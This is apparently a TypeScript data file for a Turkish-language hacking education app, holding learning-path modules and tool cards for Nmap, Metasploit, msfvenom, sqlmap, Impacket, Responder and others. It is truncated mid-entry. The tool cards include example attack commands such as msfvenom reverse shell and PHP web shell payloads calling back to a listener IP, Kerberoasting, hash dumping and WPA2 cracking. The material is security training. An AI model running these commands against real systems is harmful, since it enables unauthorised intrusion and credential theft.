import type { Module, ToolCard, Challenge } from './types'

// ─── Learning Path ────────────────────────────────────────────────────────────

export const MODULES: Module[] = [
  {
    id: 'linux-fundamentals',
    title: 'Linux Temelleri',
    subtitle: 'Komut satırına hâkimiyet',
    difficulty: 'beginner',
    color: '#00ff41',
    icon: '🐧',
    toolIds: ['netcat', 'linpeas'],
    topics: [
      'Dosya sistemi hiyerarşisi (FHS)',
      'Temel komutlar: ls, cd, cat, grep, find',
      'Dosya izinleri ve chmod/chown',
      'Stdin/stdout/stderr ve yönlendirme',
      'Pipe zinciri ve metin işleme',
      'Kullanıcı yönetimi ve sudo',
      'Ortam değişkenleri ve PATH',
      'Bash scripting temelleri',
    ],
    resources: [
      { label: 'OverTheWire: Bandit', url: 'https://overthewire.org/wargames/bandit/' },
      { label: 'Linux Journey', url: 'https://linuxjourney.com/' },
      { label: 'The Linux Command Line', url: 'https://linuxcommand.org/tlcl.php' },
    ],
  },
  {
    id: 'network-fundamentals',
    title: 'Ağ Temelleri',
    subtitle: 'TCP/IP, protokoller ve paket analizi',
    difficulty: 'beginner',
    color: '#00d4ff',
    icon: '🌐',
    toolIds: ['nmap', 'wireshark', 'netcat'],
    topics: [
      'OSI ve TCP/IP modeli',
      'IP adresleme ve subnetting',
      'TCP/UDP farkları ve handshake',
      'HTTP/HTTPS, DNS, DHCP, ARP',
      'Wireshark ile paket yakalama',
      'Nmap ile port tarama',
      'Netcat: ağın İsviçre çakısı',
      'Firewall ve IDS/IPS temelleri',
    ],
    resources: [
      { label: 'TryHackMe: Pre-Security', url: 'https://tryhackme.com/path/outline/presecurity' },
      { label: 'Wireshark Docs', url: 'https://www.wireshark.org/docs/' },
      { label: 'Nmap Book', url: 'https://nmap.org/book/' },
    ],
  },
  {
    id: 'web-security',
    title: 'Web Güvenliği',
    subtitle: 'OWASP Top 10 ve pratik saldırılar',
    difficulty: 'intermediate',
    color: '#f59e0b',
    icon: '🕸️',
    toolIds: ['burpsuite', 'sqlmap', 'gobuster', 'ffuf', 'nikto', 'wpscan', 'wfuzz', 'nuclei'],
    topics: [
      'HTTP protokolü derinlemesine',
      'OWASP Top 10 (2021)',
      'SQL Injection (SQLi)',
      'Cross-Site Scripting (XSS)',
      'CSRF, SSRF, XXE',
      'Burp Suite ile intercepting',
      'Directory traversal & LFI/RFI',
      'Authentication bypass teknikleri',
      'JWT ve session yönetimi açıkları',
      'API güvenliği',
    ],
    resources: [
      { label: 'PortSwigger Web Academy', url: 'https://portswigger.net/web-security' },
      { label: 'OWASP Testing Guide', url: 'https://owasp.org/www-project-web-security-testing-guide/' },
      { label: 'HackTheBox Web Challenges', url: 'https://app.hackthebox.com/challenges' },
    ],
  },
  {
    id: 'penetration-testing',
    title: 'Sızma Testi',
    subtitle: 'Metodoloji ve araç kullanımı',
    difficulty: 'intermediate',
    color: '#8b5cf6',
    icon: '🔓',
    toolIds: ['nmap', 'metasploit', 'msfvenom', 'linpeas', 'impacket', 'enum4linux'],
    topics: [
      'Pentest metodolojisi (PTES, OSSTMM)',
      'Kali Linux ortamı',
      'Keşif: Passive & Active Recon',
      'Zafiyet tarama: Nessus, OpenVAS',
      'Metasploit Framework',
      'Post-exploitation teknikleri',
      'Privilege escalation (Linux & Windows)',
      'Pivoting ve lateral movement',
      'Rapor yazımı ve bulgular',
    ],
    resources: [
      { label: 'PTES Standard', url: 'http://www.pentest-standard.org/' },
      { label: 'HackTheBox', url: 'https://www.hackthebox.com/' },
      { label: 'TryHackMe: Jr Pentester', url: 'https://tryhackme.com/path/outline/jrpenetrationtester' },
    ],
  },
  {
    id: 'exploit-development',
    title: 'Exploit Geliştirme',
    subtitle: 'Buffer overflow ve ileri teknikler',
    difficulty: 'advanced',
    color: '#ef4444',
    icon: '💥',
    toolIds: ['gdb', 'metasploit', 'msfvenom', 'radare2'],
    topics: [
      'x86/x64 Assembly temelleri',
      'Stack ve heap yönetimi',
      'Buffer overflow (Stack-based)',
      'Return-Oriented Programming (ROP)',
      'Format string zafiyetleri',
      'ASLR, NX/DEP, Stack Canary bypass',
      'Heap exploitation (Use-after-free)',
      'Kernel exploit geliştirme',
      'CVE analizi ve PoC yazımı',
    ],
    resources: [
      { label: 'PWN.college', url: 'https://pwn.college/' },
      { label: 'exploit.education', url: 'https://exploit.education/' },
      { label: 'LiveOverflow YouTube', url: 'https://www.youtube.com/@LiveOverflow' },
    ],
  },
  {
    id: 'reverse-engineering',
    title: 'Tersine Mühendislik',
    subtitle: 'Binary analiz ve malware inceleme',
    difficulty: 'advanced',
    color: '#f97316',
    icon: '🔬',
    toolIds: ['ghidra', 'gdb', 'radare2', 'binwalk'],
    topics: [
      'ELF ve PE binary formatları',
      'Static analiz: strings, file, objdump',
      'GDB ile dynamic analiz',
      'Radare2 ve Ghidra kullanımı',
      'Crackme çözümleri',
      'Anti-debugging teknikleri',
      'Obfuscation ve packing',
      'Firmware analizi (binwalk)',
    ],
    resources: [
      { label: 'Ghidra (NSA)', url: 'https://ghidra-sre.org/' },
      { label: 'Malware Unicorn Workshops', url: 'https://malwareunicorn.org/' },
      { label: 'Crackmes.one', url: 'https://crackmes.one/' },
    ],
  },
  {
    id: 'malware-analysis',
    title: 'Malware Analizi',
    subtitle: 'Kötü amaçlı yazılım inceleme',
    difficulty: 'advanced',
    color: '#dc2626',
    icon: '🦠',
    toolIds: ['volatility', 'binwalk', 'ghidra', 'wireshark'],
    topics: [
      'Malware türleri: RAT, Ransomware, Rootkit',
      'Güvenli analiz ortamı kurma',
      'Static analiz: PE yapısı, imports',
      'Dynamic analiz: Process Monitor, RegShot',
      'YARA kural yazımı',
      'Network traffic analizi',
      'Memory forensics (Volatility)',
      'Sandbox analizi (Any.run, Cuckoo)',
    ],
    resources: [
      { label: 'ANY.RUN Sandbox', url: 'https://any.run/' },
      { label: 'MalwareBazaar', url: 'https://bazaar.abuse.ch/' },
      { label: 'Practical Malware Analysis (kitap)', url: 'https://www.amazon.com/Practical-Malware-Analysis/dp/1593272901' },
    ],
  },
  {
    id: 'red-team',
    title: 'Red Team Operasyonları',
    subtitle: 'Gelişmiş kalıcı tehdit simülasyonu',
    difficulty: 'expert',
    color: '#7c3aed',
    icon: '🎯',
    toolIds: ['metasploit', 'mimikatz', 'impacket', 'responder', 'msfvenom'],
    topics: [
      'Red Team vs Pentest farkı',
      'MITRE ATT&CK framework',
      'C2 (Command & Control) altyapısı',
      'Cobalt Strike & Sliver',
      'Phishing kampanyaları',
      'Active Directory saldırıları',
      'Kerberoasting, Pass-the-Hash',
      'Evasion ve AV bypass',
      'OPSEC ve iz silme',
    ],
    resources: [
      { label: 'MITRE ATT&CK', url: 'https://attack.mitre.org/' },
      { label: 'Red Team Notes', url: 'https://www.ired.team/' },
      { label: 'VulnLab', url: 'https://www.vulnlab.com/' },
    ],
  },

  // ── 4 Yeni Modül ─────────────────────────────────────────────────────────────

  {
    id: 'cloud-security',
    title: 'Cloud Güvenliği',
    subtitle: 'AWS, GCP ve Azure saldırı yüzeyi',
    difficulty: 'intermediate',
    color: '#06b6d4',
    icon: '☁️',
    toolIds: ['nuclei', 'amass', 'shodan'],
    topics: [
      'Cloud paylaşım modeli (IaaS/PaaS/SaaS)',
      'AWS IAM yanlış yapılandırmaları',
      'S3 bucket açık erişim tespiti',
      'Metadata API saldırıları (SSRF→cloud)',
      'Azure AD ve Entra ID keşfi',
      'GCP service account ayrıcalıkları',
      'Container ve Kubernetes güvenliği',
      'Serverless fonksiyon güvenliği',
      'Cloud forensics ve log analizi',
    ],
    resources: [
      { label: 'HackTricks Cloud', url: 'https://cloud.hacktricks.xyz/' },
      { label: 'CloudGoat (Vulnerable AWS)', url: 'https://github.com/RhinoSecurityLabs/cloudgoat' },
      { label: 'flaws.cloud (AWS Lab)', url: 'http://flaws.cloud/' },
    ],
  },
  {
    id: 'digital-forensics',
    title: 'Dijital Adli Bilişim',
    subtitle: 'Olay müdahale ve delil analizi',
    difficulty: 'advanced',
    color: '#a78bfa',
    icon: '🔍',
    toolIds: ['volatility', 'binwalk', 'wireshark'],
    topics: [
      'DFIR metodolojisi ve zincir muhafaza',
      'Disk imajı alma (dd, FTK Imager)',
      'Dosya sistemi analizi (The Sleuth Kit)',
      'Windows artefaktları (Registry, Prefetch, LNK)',
      'Memory forensics temelleri',
      'Log analizi (Windows Event Log, Syslog)',
      'Timeline analizi ve korelasyon',
      'Ağ trafiği inceleme ve protokol analizi',
      'Olay müdahale raporu yazımı',
    ],
    resources: [
      { label: 'SANS FOR508', url: 'https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/' },
      { label: 'CyberDefenders', url: 'https://cyberdefenders.org/' },
      { label: 'Blue Team Labs Online', url: 'https://blueteamlabs.online/' },
    ],
  },
  {
    id: 'bug-bounty',
    title: 'Bug Bounty',
    subtitle: 'Recon, scope ve responsible disclosure',
    difficulty: 'intermediate',
    color: '#fb923c',
    icon: '🐛',
    toolIds: ['amass', 'sublist3r', 'ffuf', 'gobuster', 'nuclei', 'burpsuite'],
    topics: [
      'Bug bounty platformları (HackerOne, Bugcrowd, Intigriti)',
      'Scope analizi ve program seçimi',
      'Passive recon: Amass, Subfinder, Shodan',
      'Active recon: port tarama, dizin keşfi',
      'OWASP bulgu kategorileri',
      'Zafiyet doğrulama ve PoC hazırlama',
      'Etkili rapor yazımı (CVSS, reproduction steps)',
      'Duplicate önleme taktikleri',
      'Ödül optimizasyonu ve triage süreci',
    ],
    resources: [
      { label: 'HackerOne Hacktivity', url: 'https://hackerone.com/hacktivity' },
      { label: 'Bugcrowd University', url: 'https://www.bugcrowd.com/hackers/bugcrowd-university/' },
      { label: 'NahamCon Talks', url: 'https://www.youtube.com/@NahamSec' },
    ],
  },
  {
    id: 'social-engineering',
    title: 'Sosyal Mühendislik',
    subtitle: 'İnsan faktörü ve manipülasyon teknikleri',
    difficulty: 'beginner',
    color: '#f43f5e',
    icon: '🎭',
    toolIds: ['theharvester', 'maltego', 'spiderfoot'],
    topics: [
      'Sosyal mühendislik psikolojisi',
      'Pretexting ve kimlik taklit',
      'Phishing: hedefli (spear) ve genel',
      'Vishing (telefon tabanlı saldırılar)',
      'Smishing ve QR code saldırıları',
      'OSINT ile hedef profili oluşturma',
      'LinkedIn ve sosyal medya istihbaratı',
      'E-posta sahteciliği (SPF/DKIM/DMARC bypass)',
      'Farkındalık eğitimi ve karşı önlemler',
    ],
    resources: [
      { label: 'Social Engineer Toolkit (SET)', url: 'https://github.com/trustedsec/social-engineer-toolkit' },
      { label: 'Phishme / Cofense', url: 'https://cofense.com/' },
      { label: 'SE-Radio Podcast', url: 'https://www.se-radio.net/' },
    ],
  },
]

// ─── Tool Cards ───────────────────────────────────────────────────────────────

export const TOOL_CATEGORIES = ['Tümü', 'Ağ', 'Web', 'Exploit', 'Şifre', 'Keşif', 'Tersine', 'Forensics', 'OSINT'] as const

export const TOOLS: ToolCard[] = [

  // ── Ağ ───────────────────────────────────────────────────────────────────────

  {
    id: 'nmap',
    name: 'Nmap',
    category: 'Ağ',
    difficulty: 'beginner',
    version: '7.94',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Ağ keşfi ve güvenlik denetimi için endüstri standardı port tarayıcı.',
    install: 'sudo apt install nmap',
    flags: [
      { flag: '-sS',           description: 'SYN (stealth) tarama' },
      { flag: '-sV',           description: 'Servis versiyonlarını tespit et' },
      { flag: '-sC',           description: 'Varsayılan scriptleri çalıştır' },
      { flag: '-O',            description: 'İşletim sistemi tespiti' },
      { flag: '-p-',           description: 'Tüm 65535 portu tara' },
      { flag: '-A',            description: '-sV -sC -O -traceroute kombinasyonu' },
      { flag: '-T4',           description: 'Hızlı tarama modu' },
      { flag: '--script vuln', description: 'Zafiyet scriptleri' },
    ],
    examples: [
      { command: 'nmap -sV -sC -p- 10.10.10.1', description: 'Full port + servis + script tarama' },
      { command: 'nmap -sn 192.168.1.0/24',      description: 'Subnet host keşfi (ping sweep)' },
      { command: 'nmap -sS -T4 --top-ports 1000 hedef', description: 'Hızlı üst 1000 port tarama' },
      { command: 'nmap --script=http-enum hedef', description: 'HTTP dizin tarama' },
    ],
    tags: ['port-scan', 'recon', 'network'],
  },
  {
    id: 'wireshark',
    name: 'Wireshark',
    category: 'Ağ',
    difficulty: 'beginner',
    version: '4.2.4',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Grafik arayüzlü ağ protokol analizörü. Gerçek zamanlı paket yakalama.',
    install: 'sudo apt install wireshark',
    flags: [
      { flag: 'ip.addr == X.X.X.X',   description: 'IP filtresi' },
      { flag: 'tcp.port == 80',        description: 'Port filtresi' },
      { flag: 'http.request',          description: 'HTTP istekleri' },
      { flag: 'dns',                   description: 'DNS trafiği' },
      { flag: 'tcp.flags.syn == 1',    description: 'SYN paketleri' },
      { flag: 'frame contains "FLAG"', description: 'İçerik arama' },
    ],
    examples: [
      { command: 'tshark -i eth0 -w capture.pcap', description: 'CLI ile pcap kaydet' },
      { command: "tshark -r cap.pcap -Y 'http' -T fields -e http.request.uri", description: 'HTTP URL\'leri çıkar' },
      { command: "tshark -r cap.pcap -Y 'dns.flags.response == 0'", description: 'DNS sorgularını filtrele' },
    ],
    tags: ['packet-analysis', 'network', 'forensics'],
  },
  {
    id: 'netcat',
    name: 'Netcat (nc)',
    category: 'Ağ',
    difficulty: 'beginner',
    version: '1.219',
    os: ['Linux', 'macOS'],
    description: 'TCP/UDP bağlantıları için çok amaçlı ağ aracı. "Ağın İsviçre çakısı."',
    install: 'sudo apt install netcat-openbsd',
    flags: [
      { flag: '-l', description: 'Dinleme modu (listener)' },
      { flag: '-p', description: 'Port belirt' },
      { flag: '-e', description: 'Program çalıştır (eski nc)' },
      { flag: '-v', description: 'Verbose mod' },
      { flag: '-n', description: 'DNS çözümlemesi yapma' },
      { flag: '-u', description: 'UDP modu' },
    ],
    examples: [
      { command: 'nc -lvnp 4444',              description: 'Reverse shell dinleyici aç' },
      { command: 'nc 10.10.10.1 4444',         description: 'Hedefe bağlan' },
      { command: 'nc -z -v hedef 20-100',      description: 'Port tarama (20-100)' },
      { command: 'cat dosya | nc -l 1234',     description: 'Dosya transferi (gönder)' },
      { command: 'nc hedef 1234 > dosya',      description: 'Dosya transferi (al)' },
    ],
    tags: ['reverse-shell', 'network', 'pivoting'],
  },
  {
    id: 'aircrack-ng',
    name: 'Aircrack-ng',
    category: 'Ağ',
    difficulty: 'intermediate',
    version: '1.7',
    os: ['Linux', 'macOS'],
    description: 'Wi-Fi ağ güvenlik testi paketi. WEP/WPA/WPA2 kırma ve paket enjeksiyonu.',
    install: 'sudo apt install aircrack-ng',
    flags: [
      { flag: 'airmon-ng start wlan0',    description: 'Monitor moda geç' },
      { flag: 'airodump-ng wlan0mon',     description: 'Ağları tara' },
      { flag: '-c <channel>',             description: 'Kanal seç' },
      { flag: '--bssid <mac>',            description: 'Hedef AP MAC adresi' },
      { flag: '-w <file>',                description: 'Çıktı dosya adı' },
      { flag: 'aireplay-ng -0 10',        description: 'Deauth saldırısı gönder' },
    ],
    examples: [
      { command: 'sudo airmon-ng start wlan0\nsudo airodump-ng wlan0mon', description: 'Monitor moda geç ve ağları listele' },
      { command: 'sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon', description: 'Hedef AP\'yi yakala' },
      { command: 'aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap', description: 'WPA2 handshake kır' },
    ],
    tags: ['wireless', 'wifi', 'wpa2', 'cracking'],
  },
  {
    id: 'enum4linux',
    name: 'Enum4linux',
    category: 'Ağ',
    difficulty: 'beginner',
    version: '0.9.1',
    os: ['Linux'],
    description: 'Windows ve Samba sistemlerinden bilgi toplama. SMB enumeration aracı.',
    install: 'sudo apt install enum4linux\n# veya\ngit clone https://github.com/CiscoCXSecurity/enum4linux',
    flags: [
      { flag: '-a',          description: 'Tüm basit enumeration' },
      { flag: '-U',          description: 'Kullanıcıları listele' },
      { flag: '-S',          description: 'Paylaşımları listele' },
      { flag: '-P',          description: 'Şifre politikasını al' },
      { flag: '-G',          description: 'Grupları listele' },
      { flag: '-o',          description: 'OS bilgisi' },
    ],
    examples: [
      { command: 'enum4linux -a 10.10.10.1',  description: 'Tam enumeration' },
      { command: 'enum4linux -U 10.10.10.1',  description: 'Kullanıcı listesi' },
      { command: 'enum4linux -S 10.10.10.1',  description: 'SMB paylaşımları' },
    ],
    tags: ['smb', 'windows', 'enumeration', 'network'],
  },
  {
    id: 'responder',
    name: 'Responder',
    category: 'Ağ',
    difficulty: 'intermediate',
    version: '3.1.4.0',
    os: ['Linux'],
    description: 'LLMNR/NBT-NS/MDNS zehirleme aracı. Windows ağlarında NTLMv2 hash yakalama.',
    install: 'git clone https://github.com/lgandx/Responder\ncd Responder && pip3 install -r requirements.txt',
    flags: [
      { flag: '-I <interface>',  description: 'Ağ arayüzü seç' },
      { flag: '-rdw',            description: 'LLMNR, NBT-NS ve MDNS zehirle' },
      { flag: '-v',              description: 'Verbose mod' },
      { flag: '--lm',            description: 'LM hash talep et' },
      { flag: '-f',              description: 'Fingerprint modu' },
    ],
    examples: [
      { command: 'sudo python3 Responder.py -I eth0 -rdwv',  description: 'Tam poisoning modu' },
      { command: 'sudo python3 Responder.py -I eth0 -A',     description: 'Analyze modu (pasif)' },
    ],
    tags: ['llmnr', 'ntlm', 'hash-capture', 'windows', 'network'],
  },

  // ── Web ───────────────────────────────────────────────────────────────────────

  {
    id: 'burpsuite',
    name: 'Burp Suite',
    category: 'Web',
    difficulty: 'intermediate',
    version: '2024.3',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Web uygulama güvenlik testi için entegre platform. Proxy, Scanner, Intruder.',
    install: 'https://portswigger.net/burp/releases',
    flags: [
      { flag: 'Proxy → Intercept', description: 'HTTP isteğini yakala ve değiştir' },
      { flag: 'Repeater',          description: 'İsteği tekrar gönder/düzenle' },
      { flag: 'Intruder',          description: 'Brute force ve fuzzing' },
      { flag: 'Scanner',           description: 'Otomatik zafiyet tarama (Pro)' },
      { flag: 'Decoder',           description: 'Base64, URL encode/decode' },
      { flag: 'Comparer',          description: 'İki yanıtı karşılaştır' },
    ],
    examples: [
      { command: 'sqlmap -r request.txt --dbs', description: 'Burp isteği ile SQLMap' },
      { command: 'ffuf -w wordlist -u URL/FUZZ -x http://127.0.0.1:8080', description: 'Burp proxy üzerinden fuzz' },
    ],
    tags: ['web', 'proxy', 'scanner'],
  },
  {
    id: 'sqlmap',
    name: 'SQLMap',
    category: 'Web',
    difficulty: 'intermediate',
    version: '1.8.9',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'SQL injection tespiti ve sömürüsü için otomatik araç.',
    install: 'sudo apt install sqlmap',
    flags: [
      { flag: '-u',         description: 'Hedef URL' },
      { flag: '-r',         description: 'HTTP istek dosyası' },
      { flag: '--dbs',      description: 'Veritabanlarını listele' },
      { flag: '-D <db>',    description: 'Veritabanı seç' },
      { flag: '--tables',   description: 'Tabloları listele' },
      { flag: '--dump',     description: 'Tablo içeriğini döküm al' },
      { flag: '--batch',    description: 'Tüm soruları otomatik onayla' },
      { flag: '--level=5',  description: 'Test derinliği (1-5)' },
      { flag: '--os-shell', description: 'İşletim sistemi shell aç' },
    ],
    examples: [
      { command: "sqlmap -u 'http://hedef/page?id=1' --dbs --batch", description: 'Veritabanlarını keşfet' },
      { command: "sqlmap -r burp_request.txt -D users --tables --dump", description: 'Tablo dökümü al' },
      { command: "sqlmap -u 'URL' --cookie='session=abc' --level=5 --risk=3", description: 'Cookie ile yüksek seviye' },
    ],
    tags: ['sqli', 'web', 'database'],
  },
  {
    id: 'gobuster',
    name: 'Gobuster',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.6.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'HTTP dizin ve dosya brute force aracı. DNS subdomain keşfi de yapar.',
    install: 'sudo apt install gobuster',
    flags: [
      { flag: 'dir',  description: 'Dizin/dosya modu' },
      { flag: 'dns',  description: 'Subdomain keşif modu' },
      { flag: '-u',   description: 'Hedef URL' },
      { flag: '-w',   description: 'Wordlist dosyası' },
      { flag: '-x',   description: 'Dosya uzantıları (php,txt,html)' },
      { flag: '-t',   description: 'Thread sayısı (varsayılan 10)' },
      { flag: '-s',   description: 'Başarılı HTTP kodları' },
    ],
    examples: [
      { command: 'gobuster dir -u http://hedef -w /usr/share/wordlists/dirb/common.txt', description: 'Temel dizin tarama' },
      { command: 'gobuster dir -u http://hedef -w wordlist.txt -x php,txt,html -t 50',  description: 'Uzantılı hızlı tarama' },
      { command: 'gobuster dns -d hedef.com -w subdomains.txt',                          description: 'Subdomain keşfi' },
    ],
    tags: ['web', 'directory', 'brute-force'],
  },
  {
    id: 'ffuf',
    name: 'FFUF',
    category: 'Web',
    difficulty: 'beginner',
    version: '2.1.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Hızlı web fuzzer. Dizin, parametre, vhost ve content keşfi için.',
    install: 'sudo apt install ffuf',
    flags: [
      { flag: '-u',  description: 'Hedef URL (FUZZ keyword kullan)' },
      { flag: '-w',  description: 'Wordlist' },
      { flag: '-H',  description: 'Header ekle' },
      { flag: '-fs', description: 'Boyuta göre filtrele' },
      { flag: '-fc', description: 'HTTP koduna göre filtrele' },
      { flag: '-mc', description: 'Sadece bu kodları eşleştir' },
    ],
    examples: [
      { command: 'ffuf -w wordlist.txt -u http://hedef/FUZZ',                         description: 'Dizin fuzzing' },
      { command: 'ffuf -w params.txt -u "http://hedef/page?FUZZ=test" -fs 1234',      description: 'Parametre keşfi' },
      { command: 'ffuf -w vhosts.txt -u http://hedef -H "Host: FUZZ.hedef.com" -fs 0', description: 'Virtual host keşfi' },
    ],
    tags: ['web', 'fuzzing', 'recon'],
  },
  {
    id: 'nikto',
    name: 'Nikto',
    category: 'Web',
    difficulty: 'beginner',
    version: '2.1.6',
    os: ['Linux', 'macOS', 'Windows'],
    description: 'Web sunucu zafiyet tarayıcısı. 6700+ tehlikeli dosya ve CGI kontrol eder.',
    install: 'sudo apt install nikto',
    flags: [
      { flag: '-h <host>',    description: 'Hedef sunucu veya URL' },
      { flag: '-p <port>',    description: 'Port numarası (varsayılan 80)' },
      { flag: '-ssl',         description: 'SSL/HTTPS zorla' },
      { flag: '-o <file>',    description: 'Çıktıyı dosyaya kaydet' },
      { flag: '-Format htm',  description: 'HTML formatında rapor' },
      { flag: '-Tuning x',    description: 'Test kategorisi seç (0-9,x)' },
    ],
    examples: [
      { command: 'nikto -h http://target.com',                      description: 'Temel web sunucu taraması' },
      { command: 'nikto -h https://target.com -ssl -p 443',         description: 'HTTPS port 443 tarama' },
      { command: 'nikto -h target.com -o results.html -Format htm', description: 'HTML rapor oluştur' },
    ],
    tags: ['web', 'scanner', 'vulnerability', 'server'],
  },
  {
    id: 'wpscan',
    name: 'WPScan',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.8.25',
    os: ['Linux', 'macOS'],
    description: 'WordPress güvenlik tarayıcısı. Eklenti, tema ve kullanıcı zafiyetlerini bulur.',
    install: 'gem install wpscan\n# veya Docker:\ndocker run -it --rm wpscanteam/wpscan --url https://target.com',
    flags: [
      { flag: '--url <url>',          description: 'WordPress site URL' },
      { flag: '--enumerate p',        description: 'Eklentileri listele' },
      { flag: '--enumerate u',        description: 'Kullanıcıları listele' },
      { flag: '--enumerate t',        description: 'Temaları listele' },
      { flag: '--passwords <list>',   description: 'Şifre brute-force' },
      { flag: '--api-token <token>',  description: 'WPScan API token ile daha fazla CVE' },
    ],
    examples: [
      { command: 'wpscan --url https://target.com',                 description: 'Temel WordPress tarama' },
      { command: 'wpscan --url https://target.com --enumerate p,u', description: 'Eklenti ve kullanıcı listeleme' },
      { command: 'wpscan --url https://target.com --passwords /usr/share/wordlists/rockyou.txt --usernames admin', description: 'Admin şifre brute-force' },
    ],
    tags: ['web', 'wordpress', 'cms', 'vulnerability'],
  },
  {
    id: 'wfuzz',
    name: 'Wfuzz',
    category: 'Web',
    difficulty: 'intermediate',
    version: '3.1.0',
    os: ['Linux', 'macOS'],
    description: 'Web uygulama fuzzer. URL, header ve POST parametre fuzzing için güçlü araç.',
    install: 'pip3 install wfuzz\n# veya:\nsudo apt install wfuzz',
    flags: [
      { flag: '-w <wordlist>',     description: 'Kelime listesi dosyası' },
      { flag: '-u <url>',          description: 'FUZZ kelimesi bulunan URL' },
      { flag: '--hc <code>',       description: 'Bu HTTP kodu olan yanıtları gizle' },
      { flag: '--sc <code>',       description: 'Sadece bu kodu göster' },
      { flag: '-H "Header: FUZZ"', description: 'Header fuzzing' },
      { flag: '-d "param=FUZZ"',   description: 'POST data fuzzing' },
    ],
    examples: [
      { command: 'wfuzz -w wordlist.txt -u http://target.com/FUZZ --hc 404', description: 'Dizin keşfi, 404\'leri gizle' },
      { command: "wfuzz -w users.txt -w pass.txt -u http://target/login -d 'user=FUZZ&pass=FUZ2Z' --hc 403", description: 'Çift payload brute-force' },
    ],
    tags: ['web', 'fuzzing', 'brute-force', 'directory'],
  },
  {
    id: 'nuclei',
    name: 'Nuclei',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.2.9',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Şablon tabanlı zafiyet tarayıcısı. 5000+ hazır template ile hızlı tarama.',
    install: 'go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest\n# veya:\nsudo apt install nuclei',
    flags: [
      { flag: '-u <url>',           description: 'Hedef URL' },
      { flag: '-t <template>',      description: 'Şablon veya dizin' },
      { flag: '-severity <level>',  description: 'Filtre: critical,high,medium,low' },
      { flag: '-l <file>',          description: 'URL listesi dosyası' },
      { flag: '-o <file>',          description: 'Sonuçları dosyaya kaydet' },
      { flag: '-as',                description: 'Otomatik tarama modu' },
    ],
    examples: [
      { command: 'nuclei -u https://target.com',                              description: 'Tüm templatelerle tarama' },
      { command: 'nuclei -u https://target.com -severity critical,high',      description: 'Sadece kritik/yüksek bulgular' },
      { command: 'nuclei -l targets.txt -t cves/ -o results.txt',             description: 'Birden fazla hedef CVE tarama' },
    ],
    tags: ['web', 'vulnerability', 'scanner', 'template', 'cve'],
  },

  // ── Exploit ───────────────────────────────────────────────────────────────────

  {
    id: 'metasploit',
    name: 'Metasploit',
    category: 'Exploit',
    difficulty: 'intermediate',
    version: '6.4.12',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Dünyanın en çok kullanılan penetrasyon testi framework\'ü.',
    install: 'sudo apt install metasploit-framework',
    flags: [
      { flag: 'msfconsole',        description: 'Ana konsolu başlat' },
      { flag: 'search <keyword>',  description: 'Exploit/modül ara' },
      { flag: 'use <module>',      description: 'Modül seç' },
      { flag: 'show options',      description: 'Ayarları göster' },
      { flag: 'set RHOSTS <ip>',   description: 'Hedef IP' },
      { flag: 'set LHOST <ip>',    description: 'Dinleyici IP' },
      { flag: 'run / exploit',     description: 'Saldırıyı başlat' },
      { flag: 'sessions',          description: 'Aktif oturumları listele' },
    ],
    examples: [
      { command: 'msfconsole -q', description: 'Sessiz modda başlat' },
      { command: 'use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST 10.10.14.1\nrun', description: 'Reverse shell listener' },
      { command: 'search type:exploit platform:linux', description: 'Linux exploitlerini ara' },
    ],
    tags: ['exploit', 'framework', 'post-exploitation'],
  },
  {
    id: 'msfvenom',
    name: 'MSFvenom',
    category: 'Exploit',
    difficulty: 'intermediate',
    version: '6.4.12',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Metasploit payload oluşturma ve encoding aracı.',
    install: '# Metasploit ile birlikte gelir\nsudo apt install metasploit-framework',
    flags: [
      { flag: '-p',          description: 'Payload seç' },
      { flag: '-f',          description: 'Format (exe, elf, php, raw)' },
      { flag: '-o',          description: 'Çıktı dosyası' },
      { flag: '-e',          description: 'Encoder seç' },
      { flag: '-i',          description: 'Encoding iterasyon sayısı' },
      { flag: 'LHOST LPORT', description: 'Dinleyici IP ve port' },
    ],
    examples: [
      { command: 'msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell.elf', description: 'Linux reverse shell' },
      { command: 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o payload.exe', description: 'Windows Meterpreter' },
      { command: 'msfvenom -p php/reverse_php LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php', description: 'PHP web shell' },
    ],
    tags: ['payload', 'exploit', 'av-bypass'],
  },
  {
    id: 'impacket',
    name: 'Impacket',
    category: 'Exploit',
    difficulty: 'advanced',
    version: '0.12.0',
    os: ['Linux', 'macOS'],
    description: 'Windows/AD saldırıları için Python kütüphanesi. Pass-the-Hash, Kerberoasting, relay.',
    install: 'pip3 install impacket\n# veya:\ngit clone https://github.com/fortra/impacket && pip3 install .',
    flags: [
      { flag: 'psexec.py',       description: 'PsExec benzeri uzak komut çalıştırma' },
      { flag: 'smbclient.py',    description: 'SMB client, paylaşım erişimi' },
      { flag: 'secretsdump.py',  description: 'SAM/NTDS.dit hash dökümü' },
      { flag: 'GetUserSPNs.py',  description: 'Kerberoasting — SPN hesapları' },
      { flag: 'GetNPUsers.py',   description: 'AS-REP Roasting' },
      { flag: 'ntlmrelayx.py',   description: 'NTLM relay saldırısı' },
    ],
    examples: [
      { command: 'python3 psexec.py domain/user:pass@10.10.10.1', description: 'Hash ile psexec' },
      { command: 'python3 secretsdump.py domain/admin:pass@DC_IP', description: 'Domain hash dökümü' },
      { command: 'python3 GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request', description: 'Kerberoasting ticketları al' },
    ],
    tags: ['windows', 'active-directory', 'pass-the-hash', 'kerberoasting'],
  },
  {
    id: 'mimikatz',
